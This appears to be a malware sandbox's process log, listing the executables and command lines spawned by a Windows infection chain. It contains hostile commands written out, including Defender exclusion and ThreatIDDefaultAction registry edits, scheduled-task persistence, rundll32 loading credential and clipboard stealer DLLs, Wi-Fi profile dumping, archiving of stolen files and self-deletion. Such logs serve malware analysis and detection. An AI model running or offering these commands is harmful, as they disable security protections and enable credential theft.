"C:\Users\Admin\AppData\Local\Temp\f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287.exe"

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 200 -s 716

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 508

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 504

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe

"C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\735606991074_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"

C:\Users\Admin\Pictures\4bfKBpwrjclcPetR6QZGvVSR.exe

"C:\Users\Admin\Pictures\4bfKBpwrjclcPetR6QZGvVSR.exe"

C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe

"C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\A0DBxEb4CWJ5lqC6fVrKqGZv.exe

"C:\Users\Admin\Pictures\A0DBxEb4CWJ5lqC6fVrKqGZv.exe"

C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe

"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "

C:\Users\Admin\Pictures\bR2wmEBEEi1em6seHLokEXnU.exe

"C:\Users\Admin\Pictures\bR2wmEBEEi1em6seHLokEXnU.exe"

C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe

"C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe"

C:\Users\Admin\Pictures\VX91subzGlh8JGsVl1hkHR4E.exe

"C:\Users\Admin\Pictures\VX91subzGlh8JGsVl1hkHR4E.exe"

C:\Users\Admin\Pictures\fndn0JFQGewyD6YAvv4IScwI.exe

"C:\Users\Admin\Pictures\fndn0JFQGewyD6YAvv4IScwI.exe"

C:\Windows\SysWOW64\sc.exe

Sc delete GameServerClient

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService remove GameServerClient confirm

C:\Users\Admin\AppData\Local\Temp\u4ck.0.exe

"C:\Users\Admin\AppData\Local\Temp\u4ck.0.exe"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService start GameServerClient

C:\Program Files (x86)\GameServerClient\GameService.exe

"C:\Program Files (x86)\GameServerClient\GameService.exe"

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "

C:\Users\Admin\AppData\Local\Temp\u3ts.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u3ts.2\run.exe"

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

"C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe" --silent --allusers=0

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a0,0x2a4,0x2a8,0x120,0x2ac,0x6adfe1d0,0x6adfe1dc,0x6adfe1e8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\u1wfpxgDHV6skxM1Fy0QY0QV.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\u1wfpxgDHV6skxM1Fy0QY0QV.exe" --version

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

"C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4312 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425223045" --session-guid=3601f146-8a6b-45b1-8cf5-28306e354ae1 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C004000000000000

C:\Windows\SysWOW64\sc.exe

Sc delete GameServerClientC

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x69c2e1d0,0x69c2e1dc,0x69c2e1e8

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService remove GameServerClientC confirm

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService start GameServerClientC

C:\Program Files (x86)\GameServerClient\GameService.exe

"C:\Program Files (x86)\GameServerClient\GameService.exe"

C:\Program Files (x86)\GameServerClient\GameServerClientC.exe

"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe

"C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe" --silent --allusers=0

C:\Users\Admin\Pictures\N0l0UJd7MsNGmjMt43mJTRfK.exe

"C:\Users\Admin\Pictures\N0l0UJd7MsNGmjMt43mJTRfK.exe"

C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe

C:\Users\Admin\Pictures\glS8pK7urpGl0V4Uglg8faYl.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a0,0x2a4,0x2a8,0x258,0x2ac,0x6926e1d0,0x6926e1dc,0x6926e1e8

C:\Users\Admin\Pictures\kNfpNDOUekHYoBya0eTdMtCT.exe

"C:\Users\Admin\Pictures\kNfpNDOUekHYoBya0eTdMtCT.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\glS8pK7urpGl0V4Uglg8faYl.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\glS8pK7urpGl0V4Uglg8faYl.exe" --version

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\AppData\Local\Temp\u3ts.3.exe

"C:\Users\Admin\AppData\Local\Temp\u3ts.3.exe"

C:\Users\Admin\AppData\Local\Temp\u4ck.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u4ck.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\Pictures\Hi4IYDKds9gYDcBNtiTroBud.exe

"C:\Users\Admin\Pictures\Hi4IYDKds9gYDcBNtiTroBud.exe"

C:\Users\Admin\Pictures\xwQ4rB9tg3am9UsDtsfZJtfz.exe

"C:\Users\Admin\Pictures\xwQ4rB9tg3am9UsDtsfZJtfz.exe"

C:\Users\Admin\AppData\Local\Temp\u4ck.3.exe

"C:\Users\Admin\AppData\Local\Temp\u4ck.3.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3F03.tmp\Install.exe

.\Install.exe /RvdidblCuX "385118" /S

C:\Users\Admin\AppData\Local\Temp\7zS40D8.tmp\Install.exe

.\Install.exe /RvdidblCuX "385118" /S

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\DgywIex.exe\" em /MFsite_idphQ 385118 /S" /V1 /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dvsbjhP.exe\" em /tBsite_idQao 385118 /S" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Program Files (x86)\GameServerClient\GameServerClientC.exe

"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"

C:\Windows\Temp\321938.exe

"C:\Windows\Temp\321938.exe" --list-devices

C:\Windows\Temp\660037.exe

"C:\Windows\Temp\660037.exe" --coin BTC -m ADDRESSES -t 0 --range 3ff830d86c0000000:3ff830d8700000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin

C:\Users\Admin\Pictures\VX91subzGlh8JGsVl1hkHR4E.exe

"C:\Users\Admin\Pictures\VX91subzGlh8JGsVl1hkHR4E.exe"

C:\Users\Admin\Pictures\fndn0JFQGewyD6YAvv4IScwI.exe

"C:\Users\Admin\Pictures\fndn0JFQGewyD6YAvv4IScwI.exe"

C:\Users\Admin\Pictures\A0DBxEb4CWJ5lqC6fVrKqGZv.exe

"C:\Users\Admin\Pictures\A0DBxEb4CWJ5lqC6fVrKqGZv.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404252230451\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x238,0x23c,0x240,0x20c,0x210,0x336038,0x336044,0x336050

C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe

"C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe"

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dvsbjhP.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dvsbjhP.exe em /tBsite_idQao 385118 /S

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

